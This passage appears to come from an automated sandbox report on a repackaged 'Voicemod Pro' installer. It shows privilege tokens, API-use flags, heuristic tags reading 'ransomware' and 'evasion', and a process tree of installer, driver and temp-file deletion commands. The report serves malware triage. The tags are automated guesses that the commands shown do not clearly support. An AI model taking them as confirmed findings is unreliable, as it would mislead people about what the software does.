Token: SeIncBasePriorityPrivilege N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\Downloads\taskse.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 4340 wrote to memory of 5116 N/A C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 5116 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe
PID 2352 wrote to memory of 2528 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe
PID 5116 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe
PID 5116 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe
PID 5116 wrote to memory of 3272 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe
PID 3272 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe
PID 3272 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe
PID 3272 wrote to memory of 5100 N/A C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe
PID 5116 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe
PID 5116 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe
PID 5116 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Windows\system32\cmd.exe
PID 5116 wrote to memory of 4488 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Windows\system32\cmd.exe
PID 4488 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 4488 wrote to memory of 2296 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 2296 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 2296 wrote to memory of 2104 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 4488 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 4488 wrote to memory of 1592 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 3260 wrote to memory of 976 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 3260 wrote to memory of 976 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 3260 wrote to memory of 2080 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 3260 wrote to memory of 2080 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 4488 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 4488 wrote to memory of 1920 N/A C:\Windows\system32\cmd.exe C:\Program Files\Voicemod Desktop\driver\devcon.exe
PID 3260 wrote to memory of 4432 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 3260 wrote to memory of 4432 N/A C:\Windows\system32\svchost.exe C:\Windows\system32\DrvInst.exe
PID 5116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe
PID 5116 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe
PID 2540 wrote to memory of 4208 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4208 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1172 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1172 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4620 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4620 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4812 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4812 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1112 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1112 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 2868 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 2868 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4824 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4824 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1408 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1408 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4964 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4964 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 2392 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 2392 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4692 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 4692 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\System32\Conhost.exe
PID 2540 wrote to memory of 1396 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1396 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1152 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 1152 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4576 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 4576 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe
PID 2540 wrote to memory of 940 N/A C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe C:\Windows\SYSTEM32\cmd.exe

Uses Volume Shadow Copy service COM API

ransomware

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe

"C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QEFHG.tmp\VoicemodSetup.tmp" /SL5="$60214,22991991,87040,C:\Users\Admin\AppData\Local\Temp\Voicemod Pro by mr.motchy\VoicemodSetup.exe"

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe

"C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe" /quiet /norestart

C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe

"C:\Windows\Temp\{ED2F5488-7C7E-4D98-84D2-349C48F9B791}\.cr\vc_redist.x64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x64.exe" -burn.filehandle.attached=688 -burn.filehandle.self=692 /quiet /norestart

C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe

"C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe" /quiet /norestart

C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe

"C:\Windows\Temp\{A60A61C6-DF86-4316-AE12-9063B8D5B120}\.cr\vc_redist.x86.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\is-J0C7N.tmp\vc_redist.x86.exe" -burn.filehandle.attached=556 -burn.filehandle.self=692 /quiet /norestart

C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe

"C:\Program Files\Voicemod Desktop\driver\SaveDefaultDevices.exe" defaultdevices.txt

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /C ""C:\Program Files\Voicemod Desktop\driver\setupDrv.bat""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "devcon.exe dp_enum"

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon.exe dp_enum

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon install vmdrv.inf *VMDriver

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall

C:\Windows\system32\DrvInst.exe

DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{d6d9d755-21a1-004a-9992-bca29bcb94f0}\vmdrv.inf" "9" "499a51a03" "000000000000014C" "WinSta0\Default" "000000000000015C" "208" "c:\program files\voicemod desktop\driver"

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:ed86ca11e5016dc2:VOICEMOD_Driver:11.18.35.982:*vmdriver," "499a51a03" "000000000000014C"

C:\Program Files\Voicemod Desktop\driver\devcon.exe

devcon update vmdrv.inf *VMDriver

C:\Windows\system32\DrvInst.exe

DrvInst.exe "2" "211" "ROOT\MEDIA\0000" "C:\Windows\INF\oem3.inf" "oem3.inf:ed86ca11e5016dc2:VOICEMOD_Driver:11.18.35.982:*vmdriver," "499a51a03" "000000000000014C"

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe

"C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x578 0x3a4

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-alien-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-android-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-android-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-aphonic-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-beach*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-capella*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-reggae*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-birthday-rock*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cave*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cop-chase*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-cop-radio*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-fear-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-fear-background-in*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-franky-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-franky-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-ghost-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-ghost-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-harmony-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-hurry-up-in*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-hurry-up-loop*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-bee*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-growl*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-leopard*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-kong-tiger*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-magic-chords-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-party-time-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-party-time-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-possessed-background*.wav

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-robot-background*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-robot-vocoder*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-romantic-paris*.wav

C:\Windows\SYSTEM32\cmd.exe

cmd /C del /Q C:\ProgramData\Voicemod\Temp\sdk-romantic-ulala*.wav

C:\Windows\SYSTEM32\cmd.exe

